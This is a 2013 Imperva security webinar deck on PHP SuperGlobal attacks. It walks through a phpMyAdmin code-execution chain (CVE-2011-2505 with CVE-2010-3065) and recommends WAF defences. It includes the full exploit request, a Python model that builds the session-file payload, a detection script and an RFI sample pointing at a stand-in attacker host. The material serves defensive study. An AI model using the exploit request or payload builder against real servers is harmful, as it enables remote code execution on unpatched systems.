1. © 2013 Imperva, Inc. All rights reserved.
PHP SuperGlobals: Supersized Trouble
Confidential1
Tal Be’ery, Web Security Research Team Leader
2. Agenda
§ Introduction
• Relevant PHP background
§ An anatomy of a modern web exploit
• Abusing SuperGlobals
§ Additional PHP SuperGlobal attacks
• In the wild
§ Summary & conclusions
§ Q&A
3. HII Reports
§ The Hacker Intelligence Initiative (HII) focuses on understanding how attackers operate in practice
• A different approach from vulnerability research
§ Data set composition
• ~60 real-world applications
• Anonymous proxies
§ More than 24 months of data
§ Powerful analysis system
• Combines analytic tools with drill-down capabilities
4. Tal Be’ery, Web Research Team Leader
§ Web Security Research Team Leader at Imperva
§ Holds MSc & BSc degrees in CS/EE from TAU
§ 10+ years of experience in the IS (information security) domain
§ Facebook “white hat”
§ Speaker at RSA, BlackHat, AusCERT
§ Columnist for securityweek.com
§ CISSP
5. Introduction: Relevant PHP Background
6. Breadth and Depth of PHP – I
§ The most popular server-side programming language in the world
§ And it goes from strength to strength
7. Breadth and Depth of PHP – II
§ The most popular web applications are powered by PHP
Source: http://www.alexa.com/topsites
8. PHP SuperGlobals
§ Most programming languages support different scopes for variables, primarily the “local” and the “global” scope.
§ Global variables
• Provide a simple channel for cross-function communication
• More risky, as *ANY* function may change them
§ PHP has several predefined variables that are called SuperGlobals.
§ SuperGlobals provide access to the server’s core functionality – request parameters, cookies, sessions, environment, etc.
§ SuperGlobal variables are available to the PHP script in all scopes, with no need for an explicit "global" declaration inside a function.
9. PHP SuperGlobal List
    Variable     Definition
 1  $GLOBALS     References all variables available in global scope
 2  $_SERVER     Server and execution environment information
 3  $_GET        HTTP GET variables
 4  $_POST       HTTP POST variables
 5  $_FILES      HTTP file upload variables
 6  $_COOKIE     HTTP cookies
 7  $_SESSION    Session variables
 8  $_REQUEST    HTTP request variables (by default the contents of $_GET, $_POST and $_COOKIE combined)
 9  $_ENV        Environment variables
10. External Variable Modification: A PHP-Specific Weakness
§ MITRE has assigned a specific CWE (Common Weakness Enumeration) entry to the external variable modification weakness: CWE-473, "PHP External Variable Modification"
§ “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies.”
§ SuperGlobals are a natural target:
• Exist in every PHP application
• Provide access to the server’s core functionality
11. Anatomy of a Modern Web Exploit: Exploiting SuperGlobals
12. phpMyAdmin (PMA)
§ The most popular MySQL administration tool written in PHP
§ Often bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
13. CVE-2011-2505: phpMyAdmin Vulnerability
§ phpMyAdmin’s "unset session" functionality, reached through the session_to_unset request parameter
§ parse_str(): called with a single argument (the form used here; it was removed in PHP 8.0, and the two-argument form parse_str($qs, $result) stores the variables in an array instead), it parses the given query string and registers every variable in it in the current scope. As a result, *ALL* request variables, including one named _SESSION, are imported into the function’s local scope, and a variable named _SESSION is the SuperGlobal itself.
§ session_write_close(): writes the current session data to the session store and closes the session, so the data persists for the rest of the user’s session. With the default files handler, session data is implicitly written to a local file on the server.
14. CVE-2011-2505: Exploit
§ An attacker can now
• Craft a query string that carries _SESSION[...] parameters, i.e. the _SESSION SuperGlobal
• The injected _SESSION values override the session’s original values
• The new values are saved to the session file on the server
15. Serialization Explained
§ The process of converting data held in memory into a form that can be stored in a file is called “serialization”
§ The reverse process, loading data from the file back into memory, is called “deserialization”
§ PHP session data is serialized when the session is written and deserialized when a later request starts the session
Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
16. CVE-2010-3065: PHP Vulnerability & Exploit
§ Discovered by Stefan Esser in 2010; fixed in PHP 5.2.14 / 5.3.3
§ The attacker can write data into the session file in *ANY* format if the session variable name starts with ‘!’
§ In PHP’s default ("php") session serializer a leading ‘!’ marks a name that has no value; the decoder therefore does not parse the value that follows, and the attacker-supplied text is scanned as further name|value pairs
17. PMA Session Deserialization: Vulnerability
§ When a serialized PMA_Config object is deserialized from the session, its load() function is called
§ Eval is evil!
• load() evaluates the contents of the file named by the object’s "source" property, so it can be used to execute unexpected code
§ But in order to exploit this, attackers first need to specify a valid source (= a readable file they control, such as the session file itself)
18. Guessing Session Filename: Theory
§ Luckily for the attacker, the location of the session file is predictable
§ The session file name consists of
• The “sess_” prefix
• The session identifier – known to the user/attacker, since it is the value of their own session cookie
§ The file’s path is predictable
• Default values of session.save_path, e.g. /var/lib/php5 on Debian/Ubuntu PHP 5 packages
19. Guessing Session Filename: In the Wild
§ Multiple guesses for the path of the same session file (“sess_19qq…”)
20. The Final Exploit
§ Now the attackers can, *FINALLY*, get their code evaluated:
/phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}&_SESSION[payload]=<?php phpinfo(); ?>
§ The three parameters, one per link in the chain:
• session_to_unset reaches the parse_str() path of CVE-2011-2505, so the _SESSION[...] parameters overwrite the session
• _SESSION[!bla] uses the ‘!’ name of CVE-2010-3065 to smuggle a serialized PMA_Config object into the session file; its "source" is the path of that very session file (59 bytes: "/var/lib/php5/sess_" plus the 40-character session id)
• _SESSION[payload] places the PHP code in the same file, so when PMA_Config is deserialized on the next request, load() evaluates the session file and the code runs
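How the three parameters fit together is easiest to see by reproducing what ends up in the session file and what PHP's default session serializer makes of it when the file is read back. The following Python model is an added example written for this edit, not code from the talk, from PHP or from phpMyAdmin. It simulates the parse_str() step of slide 14 by writing the attacker's keys straight into a dict, mirrors the "php" session handler's encode/decode loop only as far as the CVE-2010-3065 behaviour (name|value pairs, a leading "!" meaning "no value follows", and scanning on to the next "|" after a failed unserialize), and implements just enough of unserialize() for the payload. The session id, the save path and the `reject_bad_keys` switch (modelled on the upstream fix, which refuses keys containing "|" or "!") are assumptions; the PMA_Config::load() eval step is not modelled, only the fact that the payload sits verbatim in the file load() would read.

```python
PS_DELIMITER = "|"     # separates a session variable's name from its value
PS_UNDEF_MARKER = "!"  # a leading '!' marks a name with no value following it


class PhpUnserializer:
    """Just enough of PHP's unserialize() for the payload: i, s, a and O.
    Works on str and assumes ASCII, so len() equals PHP's byte length."""

    def __init__(self, data, pos=0):
        self.d, self.i = data, pos

    def _int_until(self, sep):
        end = self.d.index(sep, self.i)
        n = int(self.d[self.i:end])
        self.i = end + 1
        return n

    def _quoted(self, n):
        s = self.d[self.i + 1:self.i + 1 + n]  # skip the opening quote
        self.i += n + 2                        # '"' + contents + '"'
        return s

    def value(self):
        t = self.d[self.i]
        self.i += 2                            # skip 't:'
        if t == "i":
            return self._int_until(";")
        if t == "s":
            s = self._quoted(self._int_until(":"))
            self.i += 1                        # trailing ';'
            return s
        if t in ("a", "O"):
            out = {}
            if t == "O":
                out["__class__"] = self._quoted(self._int_until(":"))
                self.i += 1                    # ':' before the member count
            count = self._int_until(":")
            self.i += 1                        # '{'
            for _ in range(count):
                key = self.value()
                out[key] = self.value()
            self.i += 1                        # '}'
            return out
        raise ValueError(f"not serialized data at offset {self.i - 2}")


def php_serialize_str(s):
    return 's:' + str(len(s)) + ':"' + s + '";'


def session_encode(session, reject_bad_keys):
    """The 'php' session handler's encoder for string-valued variables.
    reject_bad_keys=False writes every key verbatim, as PHP did before 5.2.14 /
    5.3.3; True refuses keys containing '|' or '!' (the upstream fix, paraphrased)."""
    out = []
    for key, val in session.items():
        if reject_bad_keys and (PS_DELIMITER in key or PS_UNDEF_MARKER in key):
            raise ValueError(f"refusing to serialize session key {key!r}")
        out.append(key + PS_DELIMITER + php_serialize_str(val))
    return "".join(out)  # entries are concatenated with no separator


def session_decode(data):
    """Mirror of the decode loop: scan to the next '|' for a name; a leading '!'
    means no value follows; otherwise unserialize one value.  When unserialize
    fails the cursor stays put, so the next iteration just scans on to the next
    '|'.  That resynchronisation is what the '!' name lets the attacker abuse."""
    session, p = {}, 0
    while p < len(data):
        q = data.find(PS_DELIMITER, p)
        if q == -1:
            break
        has_value = data[p] != PS_UNDEF_MARKER
        name = data[p if has_value else p + 1:q]
        q += 1
        if has_value:
            u = PhpUnserializer(data, q)
            try:
                session[name] = u.value()
                q = u.i
            except (ValueError, IndexError):
                pass                           # PHP: parse failed, q unchanged
        p = q
    return session


def attacker_session(session_id, key, save_path="/var/lib/php5"):
    """$_SESSION after parse_str() has imported the attacker's _SESSION[...]
    parameters (slide 14).  Object graph as on slide 20; id and path are constructed."""
    source = save_path + "/sess_" + session_id     # slide 18: predictable path
    gadget = ('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";'
              + php_serialize_str(source) + '}}')
    return {key: PS_DELIMITER + "xxx" + PS_DELIMITER + gadget,
            "payload": "<?php phpinfo(); ?>"}


def run_exploit(key="!bla"):
    """Write the injected session the vulnerable way and read it back:
    returns (session file contents, variables the decoder recovered)."""
    sid = "0123456789abcdef0123456789abcdef01234567"  # constructed 40-hex id
    stored = session_encode(attacker_session(sid, key), reject_bad_keys=False)
    return stored, session_decode(stored)


if __name__ == "__main__":
    print(run_exploit("!bla")[1])   # the 'xxx' entry is the smuggled PMA_Config
```

Running run_exploit("bla") and run_exploit("!bla") side by side shows why the "!" matters: with a plain name the decoder reads the whole injected string back as one harmless string variable, while with "!bla" it skips the value, stumbles over the s:N:" wrapper, and then picks up "xxx" with the attacker's serialized PMA_Config object as its value, whose "source" is the session file that also contains the "<?php" payload.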
21. Exploit Result
§ Arbitrary PHP code is executed
22. PMA SuperGlobal Attacks In the Wild
§ The attack source is itself a hacked server
§ It attacks (at least) two other servers
§ The attacks persist over half a year
23. A Modern Exploit Summary: Research
§ Sophisticated research
§ Combines multiple vulnerabilities and issues in multiple domains
• phpMyAdmin (PMA): CVE-2011-2505 and the eval in PMA_Config::load()
• PHP internals: the CVE-2010-3065 session serializer bug and predictable session file paths
24. A Modern Exploit Summary: Development
§ Exploit packed in a single, “click once” PHP script
§ Automates the different attack stages
§ Can be launched from infected servers to infect others
25. Additional PHP SuperGlobal Attacks: In the Wild
26. SuperGlobal Attack Targets – I
§ Exploits of specific vulnerabilities – such as the previously discussed PMA attack
§ RFI (Remote File Inclusion): trying to overwrite “_SERVER[DOCUMENT_ROOT]” so that include paths built from it point to an external resource
27. SuperGlobal Attack Targets – II
§ Part of general scanning against the site – Nikto, Acunetix, Nessus
§ IDS filter evasion: SuperGlobals provide an alternative way to represent HTTP query parameters
• For an application that imports request variables into its scope (register_globals, extract(), parse_str()), the “_REQUEST[Itemid]=1” request parameter is equivalent to “Itemid=1”
• However, it evades a naïve IDS signature that blacklists the literal string “Itemid=1”
• We have seen this evasion technique applied to several CVEs
28. SuperGlobals In the Wild
§ During May 2013:
• 3.5K requests that manipulated PHP SuperGlobal variables
• 27 different attack sources
• 24 web applications as targets
29. Targeted SuperGlobal
§ Some SuperGlobals are more targeted than others
§ The more targeted SuperGlobals provide access to more sensitive resources
Share of SuperGlobal-manipulating requests by targeted variable (May 2013):
GLOBALS   55%
ENV       14%
SERVER    14%
SESSION   13%
REQUEST    4%
30. Summary & Conclusions
31. The Importance of a Positive Security Model
§ The essence of the external variable modification weakness: the attacker can send external parameters with the same names as internal variables, and thus override the values of the latter.
§ These external parameters are not part of the standard interface of the targeted application
§ Blocking all of the internal variables’ names is difficult with a negative security approach (a blacklist of bad names, which has to be complete to work)
§ But trivial with a positive security mechanism that specifies the allowed parameter names for each resource and rejects everything else
32. Layered Application Layer Mechanisms
§ Bad news: attackers can create a complex exploit by combining several vulnerabilities
§ Good news: it is enough to break one link in the kill chain to break the chain altogether
§ An application layer solution that combines multiple detection mechanisms is crucial for effective mitigation of such complex attacks:
• Positive security model
• Negative security model for generic issues (generic directory traversal protection in this case, since the payload carries an absolute path to the session file)
• Specific CVE detection
33. Third-Party Code Perils
§ Attackers target popular applications such as the phpMyAdmin (PMA) utility
§ PMA is often bundled with other applications
§ Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks
§ Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed: protection that is on by default unless deliberately switched off (and, where possible, removing bundled tools that are not in use)
§ One way to achieve such an “opt out” security model is to deploy a Web Application Firewall (WAF) with constant updates of its security content
34. SuperGlobal Parameters In Requests Should Be Blocked
§ There is no legitimate reason for parameters named after SuperGlobals (GLOBALS, _SERVER, _SESSION, _REQUEST, _ENV, ...) to appear in valid requests, so they should be banned
§ Imperva’s WAF customers received a content update to their Web Application Firewall on January 15th, 2013
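The positive model of slide 31, the _REQUEST[...] evasion of slide 27 and the blanket rule on this slide can all be expressed as checks on the parsed parameter names of a request. The following Python is an added example written for this edit, not Imperva's WAF logic and not code from the talk; the per-resource allowlist, the sample log lines and the single "Itemid=1" signature are constructed for illustration. It also unwraps _REQUEST[x] to x before matching, which goes beyond what the slides describe: that normalisation is the general counter to the evasion rather than something the deck shows.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The nine SuperGlobal names from slide 9 ('$' is not part of a query-string name).
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_FILES",
                "_COOKIE", "_SESSION", "_REQUEST", "_ENV"}

# Positive security model: the parameter names each resource legitimately
# accepts.  Constructed for this example, not any real application's interface.
ALLOWED = {
    "/index.php": {"option", "view", "id", "Itemid"},
    "/phpMyAdmin/index.php": {"token", "db", "table", "server", "session_to_unset"},
}

# A naive negative signature of the kind slide 27 describes: a literal
# substring match for 'Itemid=1' on the raw query string.
NAIVE_SIGNATURE = "Itemid=1"

_PHP_NAME = re.compile(r"^([^\[]+)(?:\[([^\]]*)\])?")


def split_php_name(param):
    """'_REQUEST[Itemid]' -> ('_REQUEST', 'Itemid'); 'Itemid' -> ('Itemid', None).
    PHP turns the first '[...]' into an array subscript, so the text before it
    is the variable the request is really addressing."""
    m = _PHP_NAME.match(param)
    return (m.group(1), m.group(2)) if m else (param, None)


def effective_name(param):
    """The name an application sees once register_globals, extract() or
    parse_str() has imported the request: a SuperGlobal wrapper is unwrapped."""
    base, sub = split_php_name(param)
    return sub if base in SUPERGLOBALS and sub else base


def analyse_request(line):
    """Classify one constructed 'METHOD /path?query' log line."""
    method, _, target = line.partition(" ")
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    allowed = ALLOWED.get(url.path)
    findings = []
    for name, _value in params:
        base, _sub = split_php_name(name)
        if base in SUPERGLOBALS:                           # slide 34: never legitimate
            findings.append(("superglobal_parameter", name))
        elif allowed is not None and base not in allowed:  # slide 31: positive model
            findings.append(("not_in_allowlist", name))
    if allowed is None:
        findings.append(("unknown_resource", url.path))
    return {
        "method": method,
        "resource": url.path,
        "findings": findings,
        # the naive signature misses the wrapped form; matching on the
        # effective name catches both spellings
        "naive_signature_hit": NAIVE_SIGNATURE in url.query,
        "normalised_signature_hit": any(
            f"{effective_name(n)}={v}" == NAIVE_SIGNATURE for n, v in params),
    }


# Constructed request lines; the third follows the shape of the slide-20 request.
SAMPLE_REQUESTS = [
    "GET /index.php?option=com_content&Itemid=1",
    "GET /index.php?option=com_content&_REQUEST[Itemid]=1",
    "GET /phpMyAdmin/index.php?session_to_unset=123&token=abc123&_SESSION[!bla]=x",
    "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://attacker.invalid/shell",
    "GET /index.php?GLOBALS[foo]=bar&view=article",
]


def analyse_all(lines=SAMPLE_REQUESTS):
    return [analyse_request(line) for line in lines]


if __name__ == "__main__":
    for result in analyse_all():
        print(result["method"], result["resource"], result["findings"],
              "naive:", result["naive_signature_hit"],
              "normalised:", result["normalised_signature_hit"])
```

Two things are worth noting about the design. The SuperGlobal check runs on the base name before any allowlist lookup, so a "_REQUEST[Itemid]" never gets a pass just because "Itemid" is allowed for that resource. And the naive versus normalised columns make the slide-27 point concrete: the second sample line is flagged as a SuperGlobal parameter either way, but only the normalised match recognises it as the same "Itemid=1" the signature was written for.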
35. Summing Up
§ Establish a positive security model
§ Use layered application layer security mechanisms
§ Beware of third-party code perils
§ Block SuperGlobal parameters in requests
36. Webinar Materials
§ Post-webinar discussions: answers to attendee questions
§ Webinar recording link
§ Join the Imperva LinkedIn group, Imperva Data Security Direct
37. www.imperva.com